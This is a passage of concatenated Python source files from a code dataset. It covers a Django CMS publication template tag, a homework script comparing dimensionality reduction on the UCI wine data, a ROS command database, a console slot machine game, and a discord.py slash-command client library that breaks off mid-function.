query_params['in_evidence_start__lte'] = now\n query_params['in_evidence_start__gt'] = now\n if categories_csv:\n cats = [i.strip() for i in categories_csv.split(',')]\n query_params['publication__category__name__in'] = cats\n if tags_csv:\n tags = [i.strip() for i in tags_csv.split(',')]\n query_params['publication__tags__name__in'] = tags\n\n return query_params\n\n\n@register.simple_tag(takes_context=True)\ndef load_publication(context, template, publication_id):\n _func_name = 'load_publication'\n _log_msg = f'Template Tag {_func_name}'\n\n request = context['request']\n webpath = context['webpath']\n language = getattr(request, 'LANGUAGE_CODE', '')\n\n pub = Publication.objects.filter(pk=publication_id,\n is_active=True).\\\n first()\n\n if not pub:\n _msg = '{} cannot find publication id {}'.format(log_msg,\n publication_id)\n logger.error(_msg)\n return SafeString('')\n\n pub.translate_as(lang=language)\n data = {'publication': pub, 'webpath': webpath}\n return handle_faulty_templates(template, data, name=_func_name)\n\n\n@register.simple_tag(takes_context=True)\ndef load_publications_preview(context, template,\n section = None,\n number=5,\n in_evidence=False,\n categories_csv=None, tags_csv=None):\n request = context['request']\n webpath = context['webpath']\n query_params = _get_pub_qparams(context = context ,\n webpath=webpath,\n section = section,\n in_evidence = in_evidence,\n categories_csv = categories_csv,\n tags_csv = tags_csv)\n\n pub_in_context = PublicationContext.objects.\\\n filter(**query_params).\\\n order_by('order')[0:number]\n\n if not pub_in_context: return SafeString('')\n\n # i18n\n language = getattr(request, 'LANGUAGE_CODE', '')\n for i in pub_in_context:\n i.publication.translate_as(lang=language)\n\n data = {'publications': pub_in_context}\n return handle_faulty_templates(template, data,\n name='load_publications_preview')\n","sub_path":"src/cms/publications/templatetags/unicms_publications.py","file_name":"unicms_publications.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"254858892","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 30 10:34:30 2018\r\n\r\n@author: yliu2\r\n\"\"\"\r\n\r\n\r\n# *Python Machine Learning 2nd Edition* by [Sebastian Raschka](https://sebastianraschka.com), Packt Publishing Ltd. 2017\r\n# \r\n# Code Repository: https://github.com/rasbt/python-machine-learning-book-2nd-edition\r\n# \r\n# Code License: [MIT License](https://github.com/rasbt/python-machine-learning-book-2nd-edition/blob/master/LICENSE.txt)\r\n\r\n# Code edited by Yi Liu. \r\n\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom scipy import exp\r\nfrom scipy.linalg import eigh\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.datasets import make_circles\r\nfrom sklearn.decomposition import KernelPCA\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndf_wine = pd.read_csv('https://archive.ics.uci.edu/ml/'\r\n 'machine-learning-databases/wine/wine.data',\r\n header=None)\r\n\r\ndf_wine.columns = ['Class label', 'Alcohol', 'Malic acid', 'Ash',\r\n 'Alcalinity of ash', 'Magnesium', 'Total phenols',\r\n 'Flavanoids', 'Nonflavanoid phenols', 'Proanthocyanins',\r\n 'Color intensity', 'Hue',\r\n 'OD280/OD315 of diluted wines', 'Proline']\r\n\r\ndf_wine.head()\r\n\r\n\r\n\r\ncols = ['Alcohol', 'Malic acid', 'Ash',\r\n 'Alcalinity of ash', 'Magnesium', 'Total phenols',\r\n 'Flavanoids', 'Nonflavanoid phenols', 'Proanthocyanins',\r\n 'Color intensity', 'Proline']\r\n\r\nsns.pairplot(df_wine[cols], size=2.5)\r\nplt.tight_layout()\r\n# plt.savefig('images/10_03.png', dpi=300)\r\nplt.show()\r\n\r\n\r\n\r\n\r\nX, y = df_wine.iloc[:, 1:], df_wine.iloc[:, 0]\r\n\r\nX_train,X_test,y_train,y_test=train_test_split(X.values,y.values,test_size=0.2,stratify=y,random_state=42)\r\n\r\n\r\n#standard\r\nsc = StandardScaler()\r\nX_train_std = sc.fit_transform(X_train)\r\nX_test_std = sc.transform(X_test)\r\n\r\n\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_std, y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm = svm.fit(X_train_std, y_train)\r\n\r\n\r\n\r\ny_train_pred=lr.predict(X_train_std)\r\ny_test_pred=lr.predict(X_test_std)\r\nprint(\"lr, std, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, std, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\ny_train_pred=svm.predict(X_train_std)\r\ny_test_pred=svm.predict(X_test_std)\r\nprint(\"svm, std, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, std, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n#PCA\r\npca = PCA(n_components=2)\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nX_test_pca = pca.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_pca, y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm = svm.fit(X_train_pca, y_train)\r\n\r\n\r\ny_train_pred=lr.predict(X_train_pca)\r\ny_test_pred=lr.predict(X_test_pca)\r\nprint(\"lr, PCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, PCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_pca)\r\ny_test_pred=svm.predict(X_test_pca)\r\nprint(\"svm, PCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, PCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n\r\n#LDA\r\n\r\nlda = LDA(n_components=2)\r\n\r\nX_train_lda = lda.fit_transform(X_train_std,y_train)\r\nX_test_lda = lda.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr.fit(X_train_lda,y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm.fit(X_train_lda,y_train)\r\n\r\n\r\ny_train_pred=lr.predict(X_train_lda)\r\ny_test_pred=lr.predict(X_test_lda)\r\nprint(\"lr, LDA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, LDA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_lda)\r\ny_test_pred=svm.predict(X_test_lda)\r\nprint(\"svm, LDA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, LDA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n\r\n#kPCA\r\n\r\nscikit_kpca = KernelPCA(n_components=2, kernel='rbf', gamma=0.5)\r\ntransformed = scikit_kpca.fit_transform(sc.fit_transform(X.values))\r\n\r\nX_train_kpca = scikit_kpca.fit_transform(X_train_std,y_train)\r\nX_test_kpca = scikit_kpca.transform(X_test_std)\r\n\r\n\r\nlr = LogisticRegression()\r\nlr.fit(X_train_kpca,y_train);\r\n\r\n\r\nsvm = LinearSVC()\r\nsvm.fit(X_train_kpca,y_train);\r\n\r\n\r\n\r\ny_train_pred=lr.predict(X_train_kpca)\r\ny_test_pred=lr.predict(X_test_kpca)\r\nprint(\"lr, kPCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, kPCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_kpca)\r\ny_test_pred=svm.predict(X_test_kpca)\r\nprint(\"svm, kPCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, kPCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\nprint(\"My name is Yi Liu\")\r\nprint(\"My NetID is: yiliu16\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")","sub_path":"IE598_F18_HW5/Liu,Yi_IE598HW5.py","file_name":"Liu,Yi_IE598HW5.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475583800","text":"from db import Db\nimport os\nimport roslib\n\nclass CommandDb(Db):\n def __init__(self, db_filename):\n Db.__init__(self, db_filename)\n corpus_file = os.path.join(\n roslib.packages.get_pkg_dir('robot_eup'),\n 'speech/', '') + \"commands.corpus\"\n f = open(corpus_file, 'r')\n self._commands = f.readlines()\n f.close()\n for c in self._commands:\n command = c.rstrip()\n self.set(command)\n\n def set(self, command):\n self._db[command] = command\n","sub_path":"robot_eup/src/robot_eup/command_db.py","file_name":"command_db.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182197380","text":"import emoji\r\nfrom random import choice\r\n\r\nfaces = [emoji.emojize(':red_apple:'),\r\n emoji.emojize(':pear:'),\r\n emoji.emojize(':tangerine:')\r\n ]\r\n\r\nclass Purse:\r\n def __init__(self):\r\n self.__money = 10\r\n\r\n def debit(self, amount):\r\n self.__money -= amount\r\n\r\n def credit(self, amount):\r\n self.__money += amount\r\n\r\n def get_balance(self):\r\n return self.__money\r\nmypurse = Purse()\r\n\r\nclass Column:\r\n def __init__(self):\r\n self.face = \"\"\r\n\r\n def change_face(self):\r\n self.face = choice(faces)\r\n\r\n def get_face(self):\r\n return self.face\r\n\r\n\r\nclass Slot:\r\n def __init__(self):\r\n self.column1 = Column()\r\n self.column2 = Column()\r\n self.column3 = Column()\r\n self.bet = 0\r\n self.take_bet()\r\n\r\n def take_bet(self):\r\n self.bet = input(\"How much do you bet? \")\r\n if self.bet == \"N\":\r\n print(\"Thanks for playing!\")\r\n\r\n if self.bet != \"N\":\r\n try:\r\n self.bet = int(self.bet)\r\n except ValueError:\r\n self.take_bet()\r\n\r\n if self.bet < 2:\r\n print(\"Minimum bet is 2!\")\r\n self.take_bet()\r\n\r\n elif self.bet > mypurse.get_balance():\r\n print(\"You don't have enough money to make that bet! You only have:\", mypurse.get_balance())\r\n self.take_bet()\r\n else:\r\n self.pull_handle()\r\n\r\n def pull_handle(self):\r\n self.column1.change_face()\r\n self.column2.change_face()\r\n self.column3.change_face()\r\n self.show_slot()\r\n\r\n def show_slot(self):\r\n print(self.column1.get_face(), \" \", self.column2.get_face(), \" \", self.column3.get_face())\r\n self.score_slot()\r\n\r\n def score_slot(self):\r\n if self.column1.get_face() == self.column2.get_face() and self.column2.get_face() == self.column3.get_face():\r\n mypurse.credit(self.bet*1.5)\r\n print(\"You score\", self.bet*1.5, \"You have:\", mypurse.get_balance())\r\n self.take_bet()\r\n\r\n elif self.column1.get_face() == self.column2.get_face() or self.column1.get_face() == self.column3.get_face() or self.column2.get_face() == self.column3.get_face():\r\n mypurse.credit(self.bet)\r\n print(\"You score\", self.bet, \"You have:\", mypurse.get_balance())\r\n self.take_bet()\r\n\r\n else:\r\n mypurse.debit(self.bet)\r\n print(\"You score\", 0, \"You have:\", mypurse.get_balance())\r\n if mypurse.get_balance() < 2:\r\n print(\"You don't have enough money for another bet! You have\", mypurse.get_balance(), \"Thanks for playing!\")\r\n else:\r\n self.take_bet()\r\n\r\n\r\ndef run_slot_machine():\r\n mySlot = Slot()\r\n\r\n\r\nrun_slot_machine()\r\n","sub_path":"p19/assy.py","file_name":"assy.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316912037","text":"import discord\r\nfrom discord.http import Route\r\nfrom discord.shard import AutoShardedClient\r\nfrom discord.ext.commands.cooldowns import Cooldown, CooldownMapping, BucketType\r\nimport asyncio\r\nfrom .interactions import Interaction, SlashCommand\r\nimport datetime\r\n\r\n\r\n#-----------------------------------+\r\n# Utils |\r\n#-----------------------------------+\r\ndef class_name(func):\r\n res = func.__qualname__[:-len(func.__name__)]\r\n return None if len(res) == 0 else res[:-1]\r\n\r\n\r\nclass PseudoCog:\r\n def __init__(self, client):\r\n '''\r\n A shitty solution for slash-commands in cogs\r\n '''\r\n self.client = client\r\n\r\n\r\nclass HANDLER:\r\n '''\r\n # Internal use only\r\n ## A global SLashCommand handler\r\n This is done in order to give an ability to\r\n decorate functions across multiple files\r\n ```\r\n from dislash import slash_commands\r\n\r\n @slash_commands.command()\r\n async def hello(interaction):\r\n await interaction.reply('Hi')\r\n ```\r\n ### Note that you should init `SlashClient` to track `interaction_create` events\r\n '''\r\n client = None\r\n commands = {}\r\n\r\n\r\nclass SlashCommandResponse:\r\n def __init__(self, client, func, name):\r\n cogname = class_name(func)\r\n if cogname is not None:\r\n self.cog = PseudoCog(client)\r\n else:\r\n self.cog = None\r\n if hasattr(func, '__slash_checks__'):\r\n self.checks = func.__slash_checks__\r\n else:\r\n self.checks = []\r\n try:\r\n cooldown = func.__slash_cooldown__\r\n except AttributeError:\r\n cooldown = None\r\n finally:\r\n self._buckets = CooldownMapping(cooldown)\r\n self.name = name\r\n self.func = func\r\n \r\n async def __call__(self, interaction):\r\n if self.cog is not None:\r\n return await self.func(self.cog, interaction)\r\n else:\r\n return await self.func(interaction)\r\n \r\n async def invoke(self, interaction):\r\n self._prepare_cooldowns(interaction)\r\n await self(interaction)\r\n\r\n def _prepare_cooldowns(self, inter):\r\n if self._buckets.valid:\r\n dt = inter.created_at\r\n current = dt.replace(tzinfo=datetime.timezone.utc).timestamp()\r\n bucket = self._buckets.get_bucket(inter, current)\r\n retry_after = bucket.update_rate_limit(current)\r\n if retry_after:\r\n raise CommandOnCooldown(bucket, retry_after)\r\n\r\n\r\n#-----------------------------------+\r\n# Exceptions |\r\n#-----------------------------------+\r\nclass SlashCommandError(discord.DiscordException):\r\n pass\r\n\r\n\r\nclass CommandOnCooldown(SlashCommandError):\r\n \"\"\"Exception raised when the slash-command being invoked is on cooldown.\r\n\r\n This inherits from `SlashCommandError`\r\n\r\n ## Attributes\r\n \r\n `cooldown`: `Cooldown` (a class with attributes `rate`, `per`, and `type`)\r\n\r\n `retry_after`: `float` (the amount of seconds to wait before you can retry again)\r\n \"\"\"\r\n def __init__(self, cooldown, retry_after):\r\n self.cooldown = cooldown\r\n self.retry_after = retry_after\r\n super().__init__('You are on cooldown. Try again in {:.2f}s'.format(retry_after))\r\n\r\n\r\nclass NotGuildOwner(SlashCommandError):\r\n pass\r\n\r\n\r\nclass MissingGuildPermissions(SlashCommandError):\r\n def __init__(self, perms):\r\n self.perms = perms\r\n\r\n\r\nclass MissingPermissions(SlashCommandError):\r\n def __init__(self, perms):\r\n self.perms = perms\r\n\r\n\r\nclass NotOwner(SlashCommandError):\r\n pass\r\n\r\n\r\n#-----------------------------------+\r\n# Decorators |\r\n#-----------------------------------+\r\ndef command(*args, **kwargs):\r\n '''\r\n A decorator that registers a function below as response for specified slash-command\r\n\r\n `name` - name of the slash-command you want to respond to\r\n (equals to function name by default)\r\n\r\n (defaults to `None`, in this case function responds to\r\n both global and local commands with the same names)\r\n\r\n ## Example \r\n ```\r\n @slash_commands.command(name='user-info')\r\n async def user_info(interaction):\r\n # Your code\r\n ```\r\n '''\r\n def decorator(func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = kwargs.get('name', func.__name__)\r\n # is_global = kwargs.get('global')\r\n new_func = SlashCommandResponse(HANDLER.client, func, name)\r\n HANDLER.commands[name] = new_func\r\n return new_func\r\n return decorator\r\n\r\n\r\ndef check(predicate):\r\n '''\r\n A function that converts ``predicate(interaction)`` functions\r\n into slash-command decorators\r\n\r\n Example\r\n\r\n ::\r\n\r\n def is_guild_owner():\r\n def predicate(inter):\r\n return inter.author.id == inter.guild.owner_id\r\n return check(predicate)\r\n \r\n @is_guild_owner()\r\n @slash.command()\r\n async def hello(inter):\r\n await inter.reply(\"Hello, Owner.\")\r\n \r\n \r\n .. note:: **/hello** must be registered first, see :ref:`slash-command_constructor`\r\n '''\r\n def decorator(func):\r\n if isinstance(func, SlashCommandResponse):\r\n func.checks.append(predicate)\r\n else:\r\n if not hasattr(func, '__slash_checks__'):\r\n func.__slash_checks__ = []\r\n func.__slash_checks__.append(predicate)\r\n return func\r\n return decorator\r\n\r\n\r\ndef is_guild_owner():\r\n '''\r\n A decorator. Checks if the author is the guild's owner.\r\n '''\r\n def predicate(interaction):\r\n if interaction.member.id == interaction.guild.owner_id:\r\n return True\r\n raise NotGuildOwner(\"You don't own this guild\")\r\n return check(predicate)\r\n\r\n\r\ndef is_owner():\r\n '''\r\n A decorator. Checks if the author is the bot's owner.\r\n '''\r\n def predicate(interaction):\r\n if interaction.member.id in interaction.client.owner_ids:\r\n return True\r\n raise NotOwner(\"You do not own this bot.\")\r\n return check(predicate)\r\n\r\n\r\ndef has_guild_permissions(**perms):\r\n '''\r\n A decorator. Checks if the author has specific guild permissions.\r\n '''\r\n def predicate(inter):\r\n if inter.member.id == inter.guild.owner_id:\r\n return True\r\n has = inter.member.guild_permissions\r\n if has.administrator:\r\n return True\r\n if all(getattr(has, kw, True) for kw in perms):\r\n return True\r\n raise MissingGuildPermissions([kw for kw in perms if getattr(has, kw, None) is not None])\r\n return check(predicate)\r\n\r\n\r\ndef has_permissions(**perms):\r\n '''\r\n A decorator. Checks if the author has specific permissions in the channel.\r\n '''\r\n invalid = set(perms) - set(discord.Permissions.VALID_FLAGS)\r\n if invalid:\r\n raise TypeError('Invalid permission(s): %s' % (', '.join(invalid)))\r\n def predicate(inter):\r\n ch = inter.channel\r\n permissions = ch.permissions_for(inter.member)\r\n missing = [perm for perm, value in perms.items() if getattr(permissions, perm) != value]\r\n if not missing:\r\n return True\r\n raise MissingPermissions(missing)\r\n return check(predicate)\r\n\r\n\r\ndef cooldown(rate, per, type=BucketType.default):\r\n '''\r\n A decorator that adds a cooldown to a slash-command. Similar to **discord.py** cooldown decorator.\r\n\r\n A cooldown allows a command to only be used a specific amount\r\n of times in a specific time frame. These cooldowns can be based\r\n either on a per-guild, per-channel, per-user, per-role or global basis.\r\n Denoted by the third argument of ``type`` which must be of enum\r\n type ``BucketType``.\r\n\r\n If a cooldown is triggered, then ``CommandOnCooldown`` is triggered in\r\n ``on_slash_command_error`` in the local error handler.\r\n\r\n A command can only have a single cooldown.\r\n\r\n Parameters\r\n ----------\r\n \r\n rate : int\r\n The number of times a command can be used before triggering a cooldown.\r\n\r\n per : float\r\n The amount of seconds to wait for a cooldown when it's been triggered.\r\n\r\n type : BucketType\r\n The type of cooldown to have.\r\n '''\r\n def decorator(func):\r\n if isinstance(func, SlashCommandResponse):\r\n func._buckets = CooldownMapping(Cooldown(rate, per, type))\r\n else:\r\n func.__slash_cooldown__ = Cooldown(rate, per, type)\r\n return func\r\n return decorator\r\n\r\n\r\n#-----------------------------------+\r\n# Slash-commands client |\r\n#-----------------------------------+\r\nclass SlashClient:\r\n '''\r\n The main purpose of this class is to track ``INTERACTION_CREATE`` event.\r\n\r\n Parameters\r\n ----------\r\n\r\n client : commands.Client or commands.Bot\r\n\r\n Attributes\r\n ----------\r\n\r\n client : commands.Client\r\n\r\n registered_global_commands : dict\r\n All registered global commands are cached here\r\n \r\n is_ready : bool\r\n Equals to ``True`` if SlashClient is ready, otherwise it's ``False``\r\n '''\r\n def __init__(self, client):\r\n HANDLER.client = client\r\n self.client = HANDLER.client\r\n self.events = {}\r\n self.registered_global_commands = []\r\n # self.registered_guild_commands = {}\r\n self.is_ready = False\r\n self.client.loop.create_task(self._do_ignition())\r\n @property\r\n def commands(self):\r\n return HANDLER.commands\r\n\r\n def event(self, func):\r\n '''\r\n Decorator\r\n ::\r\n \r\n @slash.event\r\n async def on_ready():\r\n print(\"SlashClient is ready\")\r\n \r\n | All possible events:\r\n | ``on_ready``, ``on_slash_command_error``\r\n '''\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = func.__name__\r\n if name.startswith('on_'):\r\n name = name[3:]\r\n if name in ['slash_command_error', 'ready']:\r\n self.events[name] = func\r\n return func\r\n\r\n def command(self, *args, **kwargs):\r\n '''\r\n A decorator that registers a function below as response for specified slash-command\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n name of the slash-command you want to response to (equals to function name by default)\r\n '''\r\n def decorator(func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(f'<{func.__qualname__}> must be a coroutine function')\r\n name = kwargs.get('name', func.__name__)\r\n new_func = SlashCommandResponse(self.client, func, name)\r\n self.commands[name] = new_func\r\n return new_func\r\n return decorator\r\n \r\n # Working with slash-commands\r\n async def fetch_global_commands(self):\r\n '''Requests a list of global registered commands from the API\r\n\r\n Returns\r\n -------\r\n\r\n global_commands : List[SlashCommand]\r\n '''\r\n data = await self.client.http.request(Route('GET', '/applications/{app_id}/commands', app_id=self.client.user.id))\r\n return [SlashCommand.from_dict(dat) for dat in data]\r\n\r\n async def fetch_guild_commands(self, guild_id: int):\r\n '''Requests a list of registered commands for a specific guild\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n Returns\r\n -------\r\n\r\n guild_commands : List[SlashCommand]\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/guilds/{guild_id}/commands',\r\n app_id=self.client.user.id, guild_id=guild_id)\r\n )\r\n return [SlashCommand.from_dict(dat) for dat in data]\r\n \r\n async def fetch_global_command(self, command_id: int):\r\n '''Requests a registered global slash-command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n\r\n Returns\r\n -------\r\n\r\n global_command : SlashCommand\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id)\r\n )\r\n return SlashCommand.from_dict(data)\r\n\r\n async def fetch_guild_command(self, guild_id: int, command_id: int):\r\n '''Requests a registered guild command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n\r\n Returns\r\n -------\r\n\r\n guild_command : SlashCommand\r\n '''\r\n data = await self.client.http.request(\r\n Route('GET', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id)\r\n )\r\n return SlashCommand.from_dict(data)\r\n\r\n async def register_global_slash_command(self, slash_command: SlashCommand):\r\n '''Registers a global slash-command\r\n\r\n .. seealso:: :ref:`raw_slash_command`\r\n \r\n Parameters\r\n ----------\r\n\r\n slash_command : SlashCommand\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route('POST', '/applications/{app_id}/commands', app_id=self.client.user.id),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def register_guild_slash_command(self, guild_id: int, slash_command: SlashCommand):\r\n '''Registers a local slash-command\r\n \r\n .. seealso:: :ref:`raw_slash_command`\r\n \r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n slash_command : SlashCommand\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route(\r\n 'POST', '/applications/{app_id}/guilds/{guild_id}/commands',\r\n app_id=self.client.user.id, guild_id=guild_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def edit_global_slash_command(self, command_id: int, slash_command: SlashCommand):\r\n '''Edits a global command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n\r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n slash_command.id = command_id\r\n for i, cmd in enumerate(self.registered_global_commands):\r\n if cmd.id == command_id:\r\n self.registered_global_commands[i] = slash_command\r\n break\r\n await self.client.http.request(\r\n Route(\r\n 'PATCH', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def edit_guild_slash_command(self, guild_id: int, command_id: int, slash_command: SlashCommand):\r\n '''Edits a local command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n\r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n if not isinstance(slash_command, SlashCommand):\r\n raise ValueError('Expected instance')\r\n await self.client.http.request(\r\n Route(\r\n 'PATCH', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id\r\n ),\r\n json=slash_command.to_dict()\r\n )\r\n \r\n async def delete_global_slash_command(self, command_id: int):\r\n '''Deletes a global command\r\n\r\n Parameters\r\n ----------\r\n\r\n command_id : int\r\n '''\r\n for i, cmd in enumerate(self.registered_global_commands):\r\n if cmd.id == command_id:\r\n self.registered_global_commands.pop(i)\r\n break\r\n await self.client.http.request(\r\n Route(\r\n 'DELETE', '/applications/{app_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, cmd_id=command_id\r\n )\r\n )\r\n \r\n async def delete_guild_slash_command(self, guild_id: int, command_id: int):\r\n '''Deletes a local command\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n\r\n command_id : int\r\n '''\r\n await self.client.http.request(\r\n Route(\r\n 'DELETE', '/applications/{app_id}/guilds/{guild_id}/commands/{cmd_id}',\r\n app_id=self.client.user.id, guild_id=guild_id, cmd_id=command_id\r\n )\r\n )\r\n\r\n # Slower methods\r\n async def fetch_global_command_named(self, name: str):\r\n '''\r\n Fetches a global command that matches the specified name\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to fetch\r\n '''\r\n for c in self.registered_global_commands:\r\n if c.name == name:\r\n return c\r\n cmds = await self.fetch_global_commands()\r\n for c in cmds:\r\n if c.name == name:\r\n self.registered_global_commands.append(c)\r\n return c\r\n\r\n async def fetch_guild_command_named(self, guild_id: int, name: str):\r\n '''\r\n Fetches a guild command that matches the specified name\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to fetch\r\n '''\r\n cmds = await self.fetch_guild_commands(guild_id)\r\n for cmd in cmds:\r\n if cmd.name == name:\r\n return cmd\r\n\r\n async def edit_global_command_named(self, name: str, slash_command: SlashCommand):\r\n '''\r\n Edits a global command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to edit\r\n \r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n cmd = await self.fetch_global_command_named(name)\r\n if cmd is not None:\r\n await self.edit_global_command(cmd.id, slash_command)\r\n\r\n async def edit_guild_command_named(self, guild_id: int, name: str, slash_command: SlashCommand):\r\n '''\r\n Edits a local command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to edit\r\n \r\n slash_command : SlashCommand\r\n replacement of the old data\r\n '''\r\n cmd = await self.fetch_guild_command_named(guild_id, name)\r\n if cmd is not None:\r\n await self.edit_guild_command(guild_id, cmd.id, slash_command)\r\n\r\n async def delete_global_command_named(self, name: str):\r\n '''\r\n Deletes a global command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n name : str\r\n the name of the command to delete\r\n '''\r\n cmd = await self.fetch_global_command_named(name)\r\n if cmd is not None:\r\n await self.delete_global_command(cmd.id)\r\n\r\n async def delete_guild_command_named(self, guild_id: int, name: str):\r\n '''\r\n Deletes a local command matching the specified name.\r\n\r\n Parameters\r\n ----------\r\n\r\n guild_id : int\r\n ID of the guild where the command is registered\r\n\r\n name : str\r\n the name of the command to edit\r\n '''\r\n cmd = await self.fetch_guild_command_named(guild_id, name)\r\n if cmd is not None:\r\n await self.delete_guild_command(guild_id, cmd.id)\r\n\r\n # Internal use only\r\n async def _do_ignition(self):\r\n '''# Don't use it'''\r\n if isinstance(self.client, AutoShardedClient):\r\n for _ in range(self.client.shard_count):\r\n await self.client.wait_for('shard_connect', timeout=60)\r\n for shard_data in self.client._AutoShardedClient__shards.values():\r\n shard_data.ws._discord_parsers['INTERACTION_CREATE'] = self._do_invokation\r\n else:\r\n await self.client.wait_for('connect')\r\n self.client.ws._discord_parsers['INTERACTION_CREATE'] = self._do_invokation\r\n self.is_ready = True\r\n self.client.loop.create_task(self._activate_event('ready'))\r\n self.registered_global_commands = await self.fetch_global_commands()\r\n \r\n def _do_invokation(self, payload):\r\n '''\r\n # Don't use it\r\n '''\r\n self.client.loop.create_task(self._invoke_slash_command(payload))\r\n\r\n async def _activate_event(self, event_name, *args, **kwargs):\r\n '''\r\n # Don't use it\r\n '''\r\n func = self.events.get(event_name)\r\n if func is not None:\r\n cogname = class_name(func)\r\n if cogname is not None:\r\n await func(PseudoCog(self.client), *args, **kwargs)\r\n else:\r\n await func(*args, **kwargs)\r\n\r\n async def _invoke_slash_command(self, payload):\r\n '''\r\n # Don't use it\r\n '''\r\n name = payload['data']['name']\r\n SCR = self.commands.get(name)\r\n if SCR is not None:\r\n inter = Interaction(self.client, payload)\r\n # Run checks\r\n err = None\r\n for _check in SCR.checks:\r\n try:\r\n if not _check(inter):\r\n err = SlashCommandError(f'Command <{name}> failed')\r\n break\r\n except Exception as e:\r\n err = e\r\n break\r\n # Activate error handler in case checks failed\r\n if err is not None:\r\n if 'slash_command_error' not in self.events:\r\n raise err\r\n await 